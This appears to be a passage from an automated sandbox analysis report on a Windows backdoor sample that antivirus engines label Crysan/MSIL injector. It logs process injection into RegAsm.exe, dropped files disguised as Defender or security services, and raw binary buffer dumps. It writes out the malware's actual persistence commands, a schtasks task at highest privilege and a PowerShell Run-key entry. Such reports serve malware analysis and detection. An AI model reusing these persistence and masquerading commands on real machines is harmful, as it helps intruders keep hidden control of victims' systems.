þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ þÿÿÿ..0Û@4é@4é@4é@4é@4é@4é@4é@4é@4é@4Û@8é@8é@8é@8é@8é@8é@8é@8Û@©@ «@«@.Ä@.?AVexception@std@@Ä@.?AVbad_alloc@std@@Ä@.?AVbad_exception@std@@ base_address: 0x0040d000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà zªH2@pÂ@»<ððTPä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrcðTðV¾@@.relocªP@B base_address: 0x00400000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: Ä@.?AVlogic_error@std@@Ä@.?AVlength_error@std@@Ä@.?AVout_of_range@std@@Ä@.?AVtype_info@@Næ@»±¿Dÿÿÿÿÿÿÿÿ ! 5A CPR S WYl m pr ) ¡¤§ ·Î×Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@ÿÿÿÿ C§@§@§@\|§@x§@t§@p§@h§@`§@X§@L§@@§@8§@,§@(§@$§@ §@§@§@§@§@§@§@§@§@ü¦@ô¦@è¦@à¦@Ø¦@§@Ð¦@È¦@À¦@´¦@¬¦@ ¦@¦@¦@¦@¦@l¦@`¦@ X¦@P¦@H¦@@¦@8¦@0¦@(¦@¦@¦@ø¥@ä¥@Ð¥@À¥@¬¥@¤¥@¥@¥@¥@¥@\|¥@t¥@l¥@d¥@\¥@T¥@L¥@<¥@(¥@¥@¥@¥@¥@ø¤@è¤@Ô¤@Ä¤@°¤@¤@¤@¤@x¤@P¤@<¤@ Ó@ Ó@ Ó@ Ó@ Ó@8Û@©@@¯@¨Ó@Õ@ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZðÕ@¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ þÿÿÿ..0Û@4é@4é@4é@4é@4é@4é@4é@4é@4é@4Û@8é@8é@8é@8é@8é@8é@8é@8Û@©@ «@«@.Ä@.?AVexception@std@@Ä@.?AVbad_alloc@std@@Ä@.?AVbad_exception@std@@ base_address: 0x0040d000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3044 process_handle: 0x00000244	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà z&H2@ðÂ@»<ðhÐÐä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrchÐðÒ¾@@.relocªÐ@B base_address: 0x00400000 process_identifier: 2732 process_handle: 0x0000020c	1	1	0
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà zªH2@pÂ@»<ððTPä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrcðTðV¾@@.relocªP@B base_address: 0x00400000 process_identifier: 3044 process_handle: 0x00000244	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2640 called NtSetContextThread to modify thread in remote process 2732
Process injection	Process 2816 called NtSetContextThread to modify thread in remote process 3044
NtSetContextThread Nov. 8, 2022, 9:35 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207176 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000208 process_identifier: 2732	1	0	0
NtSetContextThread Nov. 8, 2022, 9:35 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207176 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000240 process_identifier: 3044	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2640 resumed a thread in remote process 2732
Process injection	Process 2816 resumed a thread in remote process 3044
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2732	1	0	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 3044	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

Executed a process and injected code into it, probably while unpacking (50 out of 134 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2640	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2640	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2640	1	0
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2736 thread_handle: 0x00000208 process_identifier: 2732 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: #cmd filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000020c	1	1
NtGetContextThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000208	1	0
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 region_size: 258048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000020c	1	0
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà z&H2@ðÂ@»<ðhÐÐä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrchÐðÒ¾@@.relocªÐ@B base_address: 0x00400000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x00401000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x00409000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: Ä@.?AVlogic_error@std@@Ä@.?AVlength_error@std@@Ä@.?AVout_of_range@std@@Ä@.?AVtype_info@@Næ@»±¿Dÿÿÿÿÿÿÿÿ ! 5A CPR S WYl m pr ) ¡¤§ ·Î×Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@ÿÿÿÿ C§@§@§@\|§@x§@t§@p§@h§@`§@X§@L§@@§@8§@,§@(§@$§@ §@§@§@§@§@§@§@§@§@ü¦@ô¦@è¦@à¦@Ø¦@§@Ð¦@È¦@À¦@´¦@¬¦@ ¦@¦@¦@¦@¦@l¦@`¦@ X¦@P¦@H¦@@¦@8¦@0¦@(¦@¦@¦@ø¥@ä¥@Ð¥@À¥@¬¥@¤¥@¥@¥@¥@¥@\|¥@t¥@l¥@d¥@\¥@T¥@L¥@<¥@(¥@¥@¥@¥@¥@ø¤@è¤@Ô¤@Ä¤@°¤@¤@¤@¤@x¤@P¤@<¤@ Ó@ Ó@ Ó@ Ó@ Ó@8Û@©@@¯@¨Ó@Õ@ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZðÕ@¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ þÿÿÿ..0Û@4é@4é@4é@4é@4é@4é@4é@4é@4é@4Û@8é@8é@8é@8é@8é@8é@8é@8Û@©@ «@«@.Ä@.?AVexception@std@@Ä@.?AVbad_alloc@std@@Ä@.?AVbad_exception@std@@ base_address: 0x0040d000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x0040f000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x0043d000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2732 process_handle: 0x0000020c	1	1
NtSetContextThread Nov. 8, 2022, 9:35 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207176 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000208 process_identifier: 2732	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2732	1	0
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2820 thread_handle: 0x000002ac process_identifier: 2816 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE" filepath_r: C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b4	1	1
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2816	1	0
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2888 thread_handle: 0x00000218 process_identifier: 2884 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000210	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2936 thread_handle: 0x00000220 process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000230	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 3048 thread_handle: 0x00000240 process_identifier: 3044 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: #cmd filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000244	1	1
NtGetContextThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000240	1	0
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 3044 region_size: 159744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000244	1	0
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà zªH2@pÂ@»<ððTPä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrcðTðV¾@@.relocªP@B base_address: 0x00400000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x00401000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x00409000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: Ä@.?AVlogic_error@std@@Ä@.?AVlength_error@std@@Ä@.?AVout_of_range@std@@Ä@.?AVtype_info@@Næ@»±¿Dÿÿÿÿÿÿÿÿ ! 5A CPR S WYl m pr ) ¡¤§ ·Î×Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@ÿÿÿÿ C§@§@§@\|§@x§@t§@p§@h§@`§@X§@L§@@§@8§@,§@(§@$§@ §@§@§@§@§@§@§@§@§@ü¦@ô¦@è¦@à¦@Ø¦@§@Ð¦@È¦@À¦@´¦@¬¦@ ¦@¦@¦@¦@¦@l¦@`¦@ X¦@P¦@H¦@@¦@8¦@0¦@(¦@¦@¦@ø¥@ä¥@Ð¥@À¥@¬¥@¤¥@¥@¥@¥@¥@\|¥@t¥@l¥@d¥@\¥@T¥@L¥@<¥@(¥@¥@¥@¥@¥@ø¤@è¤@Ô¤@Ä¤@°¤@¤@¤@¤@x¤@P¤@<¤@ Ó@ Ó@ Ó@ Ó@ Ó@8Û@©@@¯@¨Ó@Õ@ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZðÕ@¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ þÿÿÿ..0Û@4é@4é@4é@4é@4é@4é@4é@4é@4é@4Û@8é@8é@8é@8é@8é@8é@8é@8Û@©@ «@«@.Ä@.?AVexception@std@@Ä@.?AVbad_alloc@std@@Ä@.?AVbad_exception@std@@ base_address: 0x0040d000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x0040f000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: base_address: 0x00425000 process_identifier: 3044 process_handle: 0x00000244	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3044 process_handle: 0x00000244	1	1
NtSetContextThread Nov. 8, 2022, 9:35 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207176 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000240 process_identifier: 3044	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 3044	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2884	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2884	1	0
NtResumeThread Nov. 8, 2022, 9:35 a.m.	thread_handle: 0x00000398 suspend_count: 1 process_identifier: 2884	1	0
NtResumeThread Nov. 8, 2022, 9:36 a.m.	thread_handle: 0x00000424 suspend_count: 1 process_identifier: 2884	1	0
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 3008 thread_handle: 0x00000084 process_identifier: 3004 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 1404 thread_handle: 0x000002a0 process_identifier: 1384 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE" filepath_r: C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 1484 thread_handle: 0x000002a0 process_identifier: 2100 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE" filepath_r: C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2172 thread_handle: 0x000002a8 process_identifier: 196 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE" filepath_r: C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2216 thread_handle: 0x000002a0 process_identifier: 2196 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE" filepath_r: C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2264 thread_handle: 0x000002a8 process_identifier: 2260 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE" filepath_r: C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2364 thread_handle: 0x000002a0 process_identifier: 2456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE" filepath_r: C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2588 thread_handle: 0x000002a8 process_identifier: 2584 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\S500UBNAN.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\S500UBNAN.EXE" filepath_r: C:\Users\test22\AppData\Roaming\S500UBNAN.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2760 thread_handle: 0x000002a0 process_identifier: 2764 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE" filepath_r: C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2800 thread_handle: 0x000002a8 process_identifier: 2692 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE" filepath_r: C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2904 thread_handle: 0x000002a0 process_identifier: 2900 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE" filepath_r: C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2976 thread_handle: 0x000002a8 process_identifier: 2964 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE" filepath_r: C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 3060 thread_handle: 0x000002a0 process_identifier: 3032 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE track: 1 command_line: "C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE" filepath_r: C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1

Powershell Downloader DFSP detected (1 event)

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.MSIL.Crysan.m!c
MicroWorld-eScan	IL:Trojan.MSILZilla.17516
FireEye	Generic.mg.b28a3a496bb68f9c
ALYac	IL:Trojan.MSILZilla.17516
Cylance	Unsafe
VIPRE	IL:Trojan.MSILZilla.17516
Sangfor	Trojan.Win32.Save.a
Alibaba	Backdoor:MSIL/ResInject.5fe83c7c
Cybereason	malicious.96bb68
Arcabit	IL:Trojan.MSILZilla.D446C
BitDefenderTheta	Gen:NN.ZemsilF.34726.tm0@aqVqH2f
Cyren	W32/ABRisk.RQPR-6048
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Injector.FCD
TrendMicro-HouseCall	TROJ_GEN.R002C0DJG22
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.MSIL.Crysan.gen
BitDefender	IL:Trojan.MSILZilla.17516
Cynet	Malicious (score: 100)
Avast	Win32:InjectorX-gen [Trj]
Tencent	Msil.Backdoor.Crysan.Ikjl
Ad-Aware	IL:Trojan.MSILZilla.17516
Emsisoft	IL:Trojan.MSILZilla.17516 (B)
F-Secure	Trojan.TR/Dropper.Gen
DrWeb	Trojan.InjectNET.14
TrendMicro	TROJ_GEN.R002C0DJG22
McAfee-GW-Edition	BehavesLike.Win32.Generic.fc
SentinelOne	Static AI - Malicious PE
Trapmine	suspicious.low.ml.score
Sophos	Mal/Generic-S
APEX	Malicious
Avira	TR/Dropper.Gen
Antiy-AVL	Trojan/MSIL.Injector
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	VirTool:MSIL/ResInject!MTB
ZoneAlarm	HEUR:Backdoor.MSIL.Crysan.gen
GData	IL:Trojan.MSILZilla.17516
Google	Detected
